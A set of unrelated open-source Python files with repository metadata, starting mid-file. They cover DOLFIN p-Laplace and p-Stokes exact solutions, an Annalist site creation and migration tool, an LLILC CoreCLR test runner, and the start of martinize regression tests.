kwargs['p'] > 1.0 ... Lebesgue exponent
kwargs['eps'] >= 0.0 ... amount of regularization
kwargs['n'] uint ... x-mode
kwargs['m'] uint ... y-mode
"""
p = Symbol('p', positive=True, constant=True)
eps = Symbol('eps', nonnegative=True, constant=True)
n = Symbol('n', integer=True, positive=True, constant=True)
m = Symbol('m', integer=True, positive=True, constant=True)
x = symbols('x[0] x[1]', real=True)
dim = len(x)
u = sin(n*pi*x[0])*sin(m*pi*x[1])
Du = Matrix([diff(u, x[j]) for j in xrange(dim)])
q = (eps + Du.norm(2)**2)**(p/2-1) * Du
f = -sum(diff(q[j], x[j]) for j in xrange(dim))
u_code = ccode(u)
# Prevent division by zero
f_code = "x[0]*x[0] + x[1]*x[1] < 1e-308 ? 0.0 : \n" + ccode(f)
return [Expression(u_code, *args, **kwargs),
Expression(f_code, *args, **kwargs)]
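# Hedged usage sketch (assumes a working DOLFIN installation; the degree
# and parameter values below are arbitrary):
# u, f = pLaplace_modes(degree=4, p=11.0, eps=0.0, n=1, m=1)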
def pLaplace_ChaillouSuri(p, *args, **kwargs):
u_code = "(pow(0.5, p1) - pow((x[0]-0.5)*(x[0]-0.5)+(x[1]-0.5)*(x[1]-0.5), 0.5*p1))/p1"
f_code = "2.0"
kwargs['p1'] = p/(p-1)
return [Expression(u_code, *args, **kwargs),
Expression(f_code, *args, **kwargs)]
def pLaplace_CarstensenKlose(*args, **kwargs):
p = Symbol('p', positive=True, constant=True)
eps = Symbol('eps', nonnegative=True, constant=True)
delta = Symbol('delta', positive=True, constant=True)
x = symbols('x[0] x[1]', real=True)
r = sqrt(x[0]**2 + x[1]**2)
theta = pi + atan2(-x[1], -x[0])
u = r**delta * sin(delta*theta)
dim = len(x)
Du = Matrix([diff(u, x[j]) for j in xrange(dim)])
q = (eps + Du.norm(2)**2)**(p/2-1) * Du
f = -sum(diff(q[j], x[j]) for j in xrange(dim))
u_code = ccode(u)
f_code = ccode(f)
# Use Quadrature element as f is infinite at r=0
kwargs_f = kwargs.copy()
kwargs_f['element'] = FiniteElement('Quadrature',
kwargs_f['domain'].ufl_cell(),
kwargs_f.pop('degree'),
quad_scheme='default')
return [Expression(u_code, *args, **kwargs),
Expression(f_code, *args, **kwargs_f)]
def pStokes_vortices(*args, **kwargs):
"""Returns 4-tuple of DOLFIN Expressions initialized with *args and
**kwargs passed in and solving no-slip p-Stokes problem on unit square
as velocity, pressure, extra stress and body force.
Mandatory kwargs:
kwargs['eps'] >= 0.0 ... amount of regularization
kwargs['n'] uint ... number of vortices in each direction
kwargs['mu'] > 0.0 ... 'viscosity'
Optional kwargs:
kwargs['r'] > 1.0 ... power-law exponent, default 2
"""
if kwargs.get('r', 2) == 2:
codes = _pStokes_vortices_ccode(r=2)
else:
codes = _pStokes_vortices_ccode()
return (Expression(c, *args, **kwargs) for c in codes)
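# Hedged usage sketch (illustrative): velocity, pressure, extra stress and
# body force for a 2x2 vortex array with the default exponent r=2:
# u, p, S, f = pStokes_vortices(degree=4, eps=0.0, n=2, mu=1.0)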
def _pStokes_vortices_ccode(r=None):
n = Symbol('n', integer=True, positive=True, constant=True)
mu = Symbol('mu', positive=True, constant=True)
x = symbols('x[0] x[1]')
dim = len(x)
u = (sin(n*pi*x[0])**2*sin(2*n*pi*x[1]), -sin(n*pi*x[1])**2*sin(2*n*pi*x[0]))
p = x[0]**2
p = p - integrate(p, (x[0], 0, 1), (x[1], 0, 1))
L = Matrix(dim, dim, [diff(u[i], x[j]) for i in xrange(dim) for j in xrange(dim)])
D = (L+L.T)/2
D2 = (D*D.T).trace()
eps = Symbol('eps', nonnegative=True, constant=True)
if not r:
r = Symbol('r', positive=True, constant=True)
S = 2*mu*(eps + D2)**(r/2-1)*D
divS = tuple(sum(diff(S[i, j], x[j]) for j in xrange(dim)) for i in xrange(dim))
gradp = tuple(diff(p, x[i]) for i in xrange(dim))
f = tuple(gradp[i] - divS[i] for i in xrange(dim))
div_guard = "x[0]*x[0] + x[1]*x[1] < 1e-308 ? 0.0 : \n"
p_code = ccode(p)
u_code = tuple(ccode(u[i]) for i in xrange(dim))
f_code = tuple(div_guard + ccode(f[i]) for i in xrange(dim))
S_code = tuple(tuple(ccode(S[i, j]) for j in xrange(dim)) for i in xrange(dim))
return u_code, p_code, S_code, f_code
|
blechta/dolfin-tape
|
dolfintape/demo_problems/exact_solutions.py
|
Python
|
gpl-3.0
| 5,383
|
"""
Create Annalist/Django site data.
Note: uses data in `sampledata/empty/annalist_site`
"""
from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
__author__ = "Graham Klyne (GK@ACM.ORG)"
__copyright__ = "Copyright 2014, G. Klyne"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import os
import sys
import logging
import subprocess
import importlib
# import shutil
log = logging.getLogger(__name__)
from annalist.identifiers import ANNAL, RDFS
from annalist import layout
from annalist.util import removetree, replacetree, updatetree, ensure_dir
from annalist.models.site import Site
from . import am_errors
from .am_settings import am_get_settings, am_get_site_settings
def am_createsite(annroot, userhome, options):
"""
Create Annalist empty site data.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status = am_errors.AM_SUCCESS
sitesettings = am_get_site_settings(annroot, userhome, options)
if not sitesettings:
print("Settings not found (%s)"%(options.configuration), file=sys.stderr)
return am_errors.AM_NOSETTINGS
if len(options.args) > 0:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
site_layout = layout.Layout(sitesettings.BASE_DATA_DIR, sitesettings.SITE_DIR_NAME)
sitebasedir = site_layout.SITE_PATH
#@@@@@ sitebaseurl = "/annalist/" # @@TODO: figure more robust way to define this
sitebaseurl = sitesettings.STATIC_URL
# --- If old site exists and --force option given, remove it
if os.path.exists(os.path.join(sitebasedir, site_layout.SITEDATA_DIR)):
if options.force:
print("Removing old Annalist site at %s"%(sitebasedir))
log.info("rmtree: %s"%(sitebasedir))
removetree(sitebasedir)
else:
print(
"Old data already exists at %s (use '--force' or '-f' to overwrite)."%
(sitebasedir), file=sys.stderr
)
print(
"NOTE: using '--force' or '-f' "+
"removes old site user permissions and namespace data "+
"and requires re-initialization of Django database with local usernames; "+
"consider using 'annalist-manager updatesite'."
)
return am_errors.AM_EXISTS
# --- Initialize empty site data in target directory
print("Initializing Annalist site in %s"%(sitebasedir))
site = Site.create_site_metadata(
sitebaseurl, sitebasedir,
label="Annalist site (%s configuration)"%options.configuration,
description="Annalist %s site metadata and site-wide values."%options.configuration
)
sitedata = site.site_data_collection()
Site.create_site_readme(site)
site_data_src = os.path.join(annroot, "annalist/data/sitedata") # @@TODO: more robust definition
site_data_tgt, site_data_file = sitedata._dir_path()
print("Copy Annalist site data")
print("from %s"%site_data_src)
for sdir in layout.COLL_DIRS:
print("- %s -> %s"%(sdir, site_data_tgt))
Site.replace_site_data_dir(sitedata, sdir, site_data_src)
# @@TODO: filename logic copied from EntityRoot and Collection - create separate method for getting this
(sitedata_dir, sitedata_file) = sitedata._dir_path()
context_dir = os.path.join(sitedata_dir, layout.META_COLL_BASE_REF)
context_file = os.path.join(context_dir, layout.COLL_CONTEXT_FILE)
#@@
print("Generating %s"%(context_file))
sitedata.generate_coll_jsonld_context()
# --- Copy provider data to site config provider directory
provider_dir_src = os.path.join(annroot, "annalist/data/identity_providers")
provider_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "providers")
print("Copy identity provider data:")
print("- from: %s"%(provider_dir_src,))
print("- to: %s"%(provider_dir_tgt,))
ensure_dir(provider_dir_tgt)
updatetree(provider_dir_src, provider_dir_tgt)
# --- Copy sample system configuration files to config directory
config_dir_src = os.path.join(annroot, "annalist/data/config_examples")
config_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "config")
print("Copy system configuration sample files:")
print("- from: %s"%(config_dir_src,))
print("- to: %s"%(config_dir_tgt,))
ensure_dir(config_dir_tgt)
updatetree(config_dir_src, config_dir_tgt)
# --- Created
print("Now run 'annalist-manager initialize' to create site admin database")
return status
def am_updatesite(annroot, userhome, options):
"""
Update site data, leaving user data alone
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status = am_errors.AM_SUCCESS
sitesettings = am_get_site_settings(annroot, userhome, options)
if not sitesettings:
print("Settings not found (%s)"%(options.configuration), file=sys.stderr)
return am_errors.AM_NOSETTINGS
if len(options.args) > 0:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
site_layout = layout.Layout(sitesettings.BASE_DATA_DIR, sitesettings.SITE_DIR_NAME)
sitebasedir = site_layout.SITE_PATH
sitebaseurl = "/annalist/" # @@TODO: figure more robust way to define this
site = Site(sitebaseurl, site_layout.SITE_PATH)
sitedata = site.site_data_collection(test_exists=False)
if sitedata is None:
print("Initializing Annalist site metadata in %s (migrating to new layout)"%(sitebasedir))
site = Site.create_site_metadata(
sitebaseurl, sitebasedir,
label="Annalist site (%s configuration)"%options.configuration,
description="Annalist %s site metadata and site-wide values."%options.configuration
)
sitedata = site.site_data_collection()
site_data_src = os.path.join(annroot, "annalist/data/sitedata") # @@TODO: more robust definition
site_data_tgt, site_data_file = sitedata._dir_path()
# --- Migrate old site data to new site directory
# _annalist_site/
site_data_old1 = os.path.join(sitebasedir, site_layout.SITEDATA_OLD_DIR1)
old_site_metadata = os.path.join(site_data_old1, site_layout.SITE_META_FILE)
old_site_database = os.path.join(site_data_old1, site_layout.SITE_DATABASE_FILE)
old_users1 = os.path.join(site_data_old1, layout.USER_DIR_PREV)
old_vocabs1 = os.path.join(site_data_old1, layout.VOCAB_DIR_PREV)
if os.path.isfile(old_site_metadata):
print("Move old site metadata: %s -> %s"%(old_site_metadata, sitebasedir))
new_site_metadata = os.path.join(sitebasedir, site_layout.SITE_META_FILE)
os.rename(old_site_metadata, new_site_metadata)
if os.path.isfile(old_site_database):
print("Move old site database: %s -> %s"%(old_site_database, sitebasedir))
new_site_database = os.path.join(sitebasedir, site_layout.SITE_DATABASE_FILE)
os.rename(old_site_database, new_site_database)
if os.path.isdir(old_users1) or os.path.isdir(old_vocabs1):
print("Copy Annalist old user and/or vocab data from %s"%site_data_old1)
migrate_old_data(site_data_old1, layout.USER_DIR_PREV, site_data_tgt, layout.USER_DIR )
migrate_old_data(site_data_old1, layout.VOCAB_DIR_PREV, site_data_tgt, layout.VOCAB_DIR)
# c/_annalist_site/_annalist_collection/ - using new dir names
site_data_old2 = os.path.join(sitebasedir, site_layout.SITEDATA_OLD_DIR2)
old_users2 = os.path.join(site_data_old2, layout.USER_DIR)
old_vocabs2 = os.path.join(site_data_old2, layout.VOCAB_DIR)
if os.path.isdir(old_users2) or os.path.isdir(old_vocabs2):
print("Copy Annalist old user and/or vocab data from %s"%site_data_old2)
migrate_old_data(site_data_old2, layout.USER_DIR_PREV, site_data_tgt, layout.USER_DIR )
migrate_old_data(site_data_old2, layout.VOCAB_DIR_PREV, site_data_tgt, layout.VOCAB_DIR)
# --- Archive old site data so it's not visible next time
if os.path.isdir(site_data_old1):
archive_old_data(site_data_old1, "")
if os.path.isdir(site_data_old2):
archive_old_data(site_data_old2, "")
# --- Copy latest site data to target directory
print("Copy Annalist site data")
print("from %s"%site_data_src)
for sdir in layout.DATA_DIRS:
print("- %s -> %s"%(sdir, site_data_tgt))
Site.replace_site_data_dir(sitedata, sdir, site_data_src)
for sdir in (layout.USER_DIR, layout.VOCAB_DIR):
print("- %s +> %s"%(sdir, site_data_tgt))
Site.update_site_data_dir(sitedata, sdir, site_data_src)
for sdir in (layout.INFO_DIR,):
print("- %s ~> %s"%(sdir, site_data_tgt))
Site.expand_site_data_dir(sitedata, sdir, site_data_src)
for sdir in layout.COLL_DIRS_PREV:
remove_old_data(site_data_tgt, sdir)
print("Generating context for site data")
sitedata.generate_coll_jsonld_context()
# --- Copy provider data to site config provider directory
provider_dir_src = os.path.join(annroot, "annalist/data/identity_providers")
provider_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "providers")
print("Copy identity provider data:")
print("- from: %s"%(provider_dir_src,))
print("- to: %s"%(provider_dir_tgt,))
ensure_dir(provider_dir_tgt)
updatetree(provider_dir_src, provider_dir_tgt)
# --- Copy sample system configuration files to config directory
config_dir_src = os.path.join(annroot, "annalist/data/config_examples")
config_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "config")
print("Copy system configuration sample files:")
print("- from: %s"%(config_dir_src,))
print("- to: %s"%(config_dir_tgt,))
ensure_dir(config_dir_tgt)
updatetree(config_dir_src, config_dir_tgt)
return status
def migrate_old_data(old_site_dir, old_data_dir, new_site_dir, new_data_dir):
"""
Migrate data from a single old-site directory to the new site
"""
old_dir = os.path.join(old_site_dir, old_data_dir)
new_dir = os.path.join(new_site_dir, new_data_dir)
if os.path.isdir(old_dir):
print("- %s +> %s (migrating)"%(old_dir, new_dir))
updatetree(old_dir, new_dir)
archive_old_data(old_site_dir, old_data_dir)
return
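# Example (illustrative; all paths are placeholders):
# migrate_old_data('/data/oldsite', '_user', '/data/newsite', '_user')
# copies any old user records into the new layout via updatetree, then
# archives the old directory under a '.saved' suffix via archive_old_data.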
def archive_old_data(site_dir, data_dir):
"""
Archive old data no longer required.
"""
# print("@@ site_dir %s, data_dir %s"%(site_dir, data_dir))
old_dir = os.path.join(site_dir, data_dir)
if os.path.isdir(old_dir):
if old_dir.endswith("/"):
old_dir = old_dir[:-1]
old_dir_arc = old_dir+".saved"
print("- %s >> %s (rename)"%(old_dir, old_dir_arc))
os.rename(old_dir, old_dir_arc)
return
def remove_old_data(site_dir, data_dir):
"""
Remove old data no longer required.
"""
old_dir = os.path.join(site_dir, data_dir)
if os.path.isdir(old_dir):
print("- %s (remove)"%(old_dir,))
removetree(old_dir)
return
# End.
|
gklyne/annalist
|
src/annalist_root/annalist_manager/am_createsite.py
|
Python
|
mit
| 12,192
|
#!/usr/bin/env python
#
#title :llilc_runtest.py
#description :
#
# This script runs CoreCLR test with specified LLILC JIT and pre-built
# CoreCLR runtime. If verbose level is specified, either summary or
# verbose, a result will be created in default location or a place
# that is specified. In verbose case, the result will be normalized
# with filter.
#
# It is required to run this script from tests directory in a CoreCLR
# repository.
#
# To exclude undesired test cases, please edit exclusion.targets file.
#
# usage: llilc_runtest.py [-h] [-a {x64,x86}] [-b {debug,release}] [-p] [-n]
# [-d {summary,verbose}] [-r RESULT_PATH] -j JIT_PATH -c
# CORECLR_RUNTIME_PATH
#
# optional arguments:
# -h, --help show this help message and exit
# -a {x64,x86}, --arch {x64,x86}
# the target architecture
# -b {debug,release}, --build {debug,release}
# release or debug build of CoreCLR run-time used
# -d {summary,verbose}, --dump-level {summary,verbose}
# the dump level: summary, or verbose
# -n, --ngen Use ngened mscorlib
# -p, --precise-gc Test with Precise GC (default: Test with Conservative GC)
# -s, --insert-statepoints
# Test with Statepoints inserted, regardless of GC settings.
# -r RESULT_PATH, --result-path RESULT_PATH
# the path to runtest result output directory
#
# required arguments:
# -j JIT_PATH, --jit-path JIT_PATH
# full path to jit .dll
# -c CORECLR_RUNTIME_PATH, --coreclr-runtime-path CORECLR_RUNTIME_PATH
# full path to CoreCLR run-time binary directory
#
#==========================================================================================
import argparse
import time
import os
import shutil
import glob
import sys
import stat
import subprocess
import applyfilter
import const
# Return OS name used internally in paths
def OSName():
if os.name == 'nt':
return 'Windows_NT'
else:
return 'Unknown'
# Return the built test path relative to the CoreCLR tests directory
def BuiltTestPath(arch, build):
built_test_directory = OSName() + '.' + arch + '.' + build
built_test_path = os.path.join('..', 'bin', 'tests', built_test_directory)
return built_test_path
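# Example (illustrative): on Windows, BuiltTestPath('x64', 'release')
# returns '..\bin\tests\Windows_NT.x64.release'.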
# Exclude top-level test directories
def ExcludeTopLevelTestDirectories():
os.environ['SkipTestAssemblies'] = 'Common;Exceptions;GC;Loader;managed;packages;Regressions;runtime;Tests;TestWrappers_x64_release;Threading'
# Remove unwanted test result files
def CleanUpResultFiles(path):
try:
for root, subdirs, files in os.walk(path):
for file in files:
if not file.endswith('error.txt'):
file_path = os.path.join(root, file)
os.remove(file_path)
except OSError:
pass
# Return default result path if result is generated
def DefaultResultPath():
default_result_path = os.environ['TEMP']
default_result_path = os.path.join(default_result_path, 'LLILCTestResult')
return default_result_path
# Remove readonly files
def del_rw(action, name, exc):
os.chmod(name, stat.S_IWRITE)
os.remove(name)
# Count files in a directory
def CountFiles(path, suffix):
total = 0
for root, sub_dirs, files in os.walk(path):
for file_name in files:
if file_name.endswith(suffix):
total = total + 1
return total
# Expand the absolute path
def expandPath(path):
return os.path.abspath(os.path.expanduser(path))
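# Example (illustrative): expandPath('~/llilc/bin/LLILCJit.dll') returns an
# absolute path with '~' expanded to the user's home directory.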
def main(argv):
# define return code const value
const.RunTestFail = 1
const.RunTestOK = 0
const.GeneralError = -1
const.UnknownArguments = -2
const.NormalizationFail = -3
const.InvalidPath = -4
# Parse the command line
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--arch', type=str, choices={'x86', 'x64'},
default='x64', help='the target architecture')
parser.add_argument('-b', '--build', type=str, choices={'release', 'debug'},
default='debug', help='release or debug build of CoreCLR run-time used')
parser.add_argument('-d', '--dump-level', type=str, choices={'summary', 'verbose'},
help='the dump level: summary, or verbose')
parser.add_argument('-r', '--result-path', type=str,
default=DefaultResultPath(), help='the path to runtest result output directory')
parser.add_argument('-t', '--runtest-path', type=str,
default=None, help='the full path to the CoreCLR\\tests directory')
parser.add_argument('-n', '--ngen', help='use ngened mscorlib', default=False, action="store_true")
parser.add_argument('-s', '--insert-statepoints', help='Insert GC Statepoints',
default=False, action="store_true")
parser.add_argument('-p', '--precise-gc', help='test with precise gc', default=False, action="store_true")
required = parser.add_argument_group('required arguments')
required.add_argument('-j', '--jit-path', required=True,
help='full path to jit .dll')
required.add_argument('-c', '--coreclr-runtime-path', required=True,
help='full path to CoreCLR run-time binary directory')
args, unknown = parser.parse_known_args(argv)
if unknown:
print('Unknown argument(s): ', ', '.join(unknown))
return const.UnknownArguments
coreclr_runtime_full_path = expandPath(args.coreclr_runtime_path)
if (not os.path.isdir(coreclr_runtime_full_path)):
print('Please specify valid --coreclr-runtime-path to CoreCLR run-time binary directory')
return const.InvalidPath
jit_full_path = expandPath(args.jit_path)
if (not os.path.isfile(jit_full_path)):
print('Please specify valid --jit-path to the jit .dll')
return const.InvalidPath
result_full_path = expandPath(args.result_path)
print('Result path: ', result_full_path)
# Ensure the command run from a CoreCLR tests directory
runtest_dir = args.runtest_path
if (args.runtest_path is None):
runtest_dir = os.getcwd()
# All platforms other than Windows run runtest.sh
runtest_full_path = os.path.join(runtest_dir, 'runtest.sh')
# On Windows, we will run runtest.cmd
if sys.platform == "win32":
runtest_full_path = os.path.join(runtest_dir, 'runtest.cmd')
if (not os.path.isfile(runtest_full_path)):
print('Please specify --runtest-path or run from the tests directory in a CoreCLR repository')
return const.InvalidPath
try:
# Determine the built test location
build_test_path = BuiltTestPath(str(args.arch), str(args.build))
# Determine time stamp
time_stamp = str(time.time()).split('.')[0]
# Copy in llilcjit.dll with time stamp
time_stamped_jit_name = 'LLILCJit' + time_stamp + '.dll'
time_stamped_jit_path = os.path.join(coreclr_runtime_full_path, time_stamped_jit_name)
shutil.copy2(jit_full_path, time_stamped_jit_path)
# Create llilctestenv.cmd with time stamp
time_stamped_test_env_name = 'LLILCTestEnv' + time_stamp + '.cmd'
time_stamped_test_env_path = os.path.join(coreclr_runtime_full_path, time_stamped_test_env_name)
# TODO: the test env script is Windows-only for now; expand when cross-platform
with open(time_stamped_test_env_path, 'w') as test_env:
test_env.write('set COMPlus_AltJit=*\n')
test_env.write('set COMPlus_AltJitName=' + time_stamped_jit_name + '\n')
if (args.precise_gc):
test_env.write('set COMPlus_InsertStatepoints=1\n')
else:
test_env.write('set COMPlus_GCConservative=1\n')
if (args.insert_statepoints):
test_env.write('set COMPlus_InsertStatepoints=1\n')
if (not args.ngen):
test_env.write('set COMPlus_ZapDisable=1\n')
test_env.write('chcp 65001\n')
if args.dump_level is not None:
test_env.write('set COMPlus_DumpLLVMIR=' + args.dump_level + '\n')
# Exclude undesired tests from running
ExcludeTopLevelTestDirectories()
except:
e = sys.exc_info()[0]
print('Error: RunTest failed due to ', e)
return const.GeneralError
# Run the test
return_code = const.RunTestOK
exclusion = os.path.join(os.path.dirname(__file__), 'exclusion.targets')
runtest_command = runtest_full_path + ' ' + args.arch + ' ' + args.build
runtest_command = runtest_command + ' Exclude ' + exclusion
runtest_command = runtest_command + ' Testenv ' + time_stamped_test_env_path
runtest_command = runtest_command + ' ' + coreclr_runtime_full_path
print(runtest_command)
error_level = subprocess.call(runtest_command, shell=True)
if error_level == 1:
return_code = const.RunTestFail
# Remove temporary time-stamped jit and test env files
try:
os.remove(time_stamped_jit_path)
os.remove(time_stamped_test_env_path)
except:
e = sys.exc_info()[0]
print('Error: RunTest failed due to ', e)
return const.GeneralError
# Copy out result if there is one, clean up undesired files,
# In case of verbose result, normalize it and extract out summary.
# In case of summary result, rename all result file name.
if args.dump_level is not None:
try:
coreclr_result_path = os.path.join(build_test_path, 'Reports')
if os.path.exists(result_full_path):
shutil.rmtree(result_full_path, onerror=del_rw)
shutil.copytree(coreclr_result_path, result_full_path)
CleanUpResultFiles(result_full_path)
total = CountFiles(result_full_path, 'error.txt')
if args.dump_level == 'verbose':
print('Verbose-mode post-processing started')
print('found ', total, 'valid raw test outputs (error.txt) under ', str(coreclr_result_path))
print('creating normalized outputs (error.txt) under ', str(result_full_path))
print('creating summary outputs (sum.txt) under ', str(result_full_path))
applyfilter.ApplyAll(result_full_path)
print('Verbose-mode post-processing finished')
if args.dump_level == 'summary':
print('Summary-mode post-processing started')
print('found ', total, 'valid raw test outputs (error.txt) under ', os.path.abspath(coreclr_result_path))
print('creating summary outputs (sum.txt) under ', str(result_full_path))
applyfilter.SummaryRenameAll(result_full_path)
print('Summary-mode post-processing finished')
except:
e = sys.exc_info()[0]
print('Error: Test result normalization failed due to ', e)
return const.NormalizationFail
else:
print('No post-processing needed.')
return return_code
if __name__ == '__main__':
return_code = main(sys.argv[1:])
sys.exit(return_code)
|
dkorolev/llilc
|
test/llilc_runtest.py
|
Python
|
mit
| 11,351
|
#!/usr/bin/env python
# MARTINIZE
# A simple, versatile tool for coarse-graining molecular systems
# Copyright (C) 2017 Tsjerk A. Wassenaar and contributors
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""
Regression tests for martinize.
This test suite runs the martinize command line with various sets of
arguments, and asserts that the results correspond to those obtained with
previous versions.
Notice that these tests do not assess that the results are correct. Instead,
they assess that changes do not affect the behaviour of the program.
If run as a script, this generates the reference files expected by the tests.
If run using pytest or nosetests, it executes martinize with a series of
arguments and compares the output to the reference.
"""
from __future__ import print_function
import contextlib
import functools
import glob
import mock
import os
import random
import shutil
import shlex
import subprocess
import sys
import tempfile
import textwrap
import importlib
import testfixtures
from nose.tools import assert_equal, assert_raises
import utils
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
from itertools import izip_longest as zip_longest
except ImportError:
from itertools import zip_longest
PROGRAM = 'martinize'
CLI = importlib.import_module(".".join([PROGRAM, "cli"]))
HERE = os.path.abspath(os.path.dirname(__file__))
EXECUTABLE = utils.which(PROGRAM)
DATA_DIR = os.path.join(HERE, 'data')
INPUT_DIR = os.path.join(HERE, 'data', 'inputs')
RANDSEED = '42'
SEED_ENV = 'INSANE_SEED'
PDB_LIST = ('1ubq', '3csy', '2qwo', '1a8g', '2oar') #, '1cag')
FF_LIST = (
'martini21', 'martini21p',
'martini22', 'martini22p',
'elnedyn', 'elnedyn22', 'elnedyn22p',
'elnedyn_BBbonds', 'elnedyn_BBconstr',
'elnedyn22_BBbonds', 'elnedyn22_BBconstr',
'elnedyn22p_BBbonds', 'elnedyn22p_BBconstr',
)
# The arguments to test insane with are listed here. The tuple is used both to
# generate the references, and to run the tests.
# To add a test case, add the arguments to test in the tuple.
SIMPLE_TEST_CASES = [
('-f {}.pdb'.format(pdb), pdb) for pdb in PDB_LIST
]
SIMPLE_TEST_CASES.extend([
# Examples from the martini tutorial
# <http://cgmartini.nl/index.php/tutorials-general-introduction-gmx5/proteins-gmx5>
('-f 1ubq.pdb -o system-vaccum.top -x 1UBQ-CG.pdb '
'-dssp dssp -p backbone -ff martini22', '1ubq'),
('-f 1ubq.pdb -o system-vaccum.top -x 1UBQ-CG.pdb '
'-ss chainA.ss -p backbone -ff martini22', '1ubq-ss'),
('-f 1a8g.pdb -o system-vaccum.top -x 1A8G-CG.pdb '
'-dssp dssp -p backbone -ff martini22', '1a8g'),
('-f 1a8g.pdb -o system-vaccum.top -x 1A8G-CG.pdb '
'-dssp dssp -p backbone -ff martini22 '
'-elastic -ef 500 -el 0.5 -eu 0.9 -ea 0 -ep 0', '1a8g', '1a8g-elastic'),
('-f 1a8g.pdb -o system-vaccum.top -x 1UBQ-CG.pdb '
'-dssp dssp -p backbone -ff elnedyn22', '1a8g'),
])
SIMPLE_TEST_CASES.extend([
# Examples taken from Djurre's tests
# <https://github.com/cgmartini/martinize.py/blob/master/test/test.sh>
('-f 1ubq.pdb -o 1UBQ_cg.top -x 1UBQ_cg.pdb '
'-ss ~EEEEEETTS~EEEEE~~TTSBHHHHHHHHHHHH~~~GGGEEEEETTEE~~TTSBTGGGT~~TT~EEEEEE~~S~~',
'1ubq', '1ubq-inline-ss'),
('-f 2oar.pdb -o 2OAR_cg.top -x 2OAR_cg.pdb '
'-sep -nt -p All -pf 500 -dssp dssp -ff martini22', '2oar'),
('-f 1cag.pdb -o 1CAG_cg.top -x 1CAG_cg.pdb -collagen -ff martini22', '1cag'),
('-f 3sjm.pdb -o 3SJM_cg.top -x 3SJM_cg.pdb -collagen -ff martini22dna', '3sjm'),
])
SIMPLE_TEST_CASES.extend([
('-f 1l35.pdb -o 1L35_cg.top -x 1l35_cg.pdb '
'-cys auto -name lysozyme -dssp dssp -ed -ff {}'.format(ff), '1l35')
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f 1a8g.pdb -merge A,B', '1a8g'),
('-f 2oar.pdb -merge A,B,C -merge D,E', '2oar'),
('-f 1ubq.gro -x 1ubq-cg.pdb', '1ubq-gro'),
('-f 1ubq.gro -x 1ubq-cg.pdb -dssp dssp', '1ubq-gro'),
('-f 1ubq.pdb -x cg.pdb -o cg.top '
'-ss CEEEEEETTSCEEEEECCTTSC1111HHHH2222CCCCCCEEEEETTEECCTTSCTCCCTCCTTCEEEEEECCSCC',
'1ubq', '1ubq-explicit-ss-from-self'),
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -ff {} -x cg.pdb -o cg.top'.format(pdb, ff), pdb)
for pdb in PDB_LIST
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -ff {} -dssp dssp -x cg.pdb -o cg.top'.format(pdb, ff), pdb)
for pdb in PDB_LIST
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -nmap nmap.idx -ff {}'.format(pdb, ff), pdb)
for pdb in PDB_LIST
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -n index.idx'.format(pdb), pdb) for pdb in PDB_LIST
])
SIMPLE_TEST_CASES.extend([
('-f 2oar.pdb -x cg.pdb -ff martini22.json', 'json22'),
])
def _arguments_as_list(arguments):
"""
    Return the arguments as a list, as expected by subprocess.Popen.
    The arguments can be provided as a string that will be split into a
    list; for example, '-f 1ubq.pdb -dssp dssp' becomes
    ['-f', '1ubq.pdb', '-dssp', 'dssp']. They can also be provided as a
    list, in which case the list is returned untouched.
"""
    try:
        arguments_list = shlex.split(arguments)
    except (AttributeError, TypeError, ValueError):
        # shlex.split only accepts strings; assume the arguments were
        # already provided as a list.
        arguments_list = arguments
    return arguments_list
def _split_case(case):
"""
Get the arguments and the input directory from a test case.
"""
if len(case) == 3:
case_args, input_dir, alias = case
if input_dir is not None:
input_dir = os.path.join(INPUT_DIR, input_dir)
elif len(case) == 2:
case_args, input_dir = case
input_dir = os.path.join(INPUT_DIR, input_dir)
alias = case_args
else:
case_args = case
input_dir = None
alias = case_args
return case_args, input_dir, alias
def _reference_path(arguments, alias=None):
"""
Get the path to the reference files for the simple test cases.
"""
simple_case_ref_data = os.path.join(DATA_DIR, 'simple_case')
base_name = arguments if alias is None else alias
return os.path.join(simple_case_ref_data, base_name)
def _run_external(arguments):
command = [EXECUTABLE] + arguments
    env = {SEED_ENV: RANDSEED} if SEED_ENV else {}
process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
out, err = process.communicate()
log = ''
return out, err, log, process.returncode
def _run_internal(arguments):
if SEED_ENV:
os.environ[SEED_ENV] = RANDSEED
random.seed(RANDSEED)
command = [EXECUTABLE] + arguments
out = StringIO()
err = StringIO()
with mock.patch('random.random', return_value=0.1):
with utils._redirect_out_and_err(out, err):
with testfixtures.LogCapture() as log:
returncode = CLI.main(command)
out = out.getvalue()
err = err.getvalue()
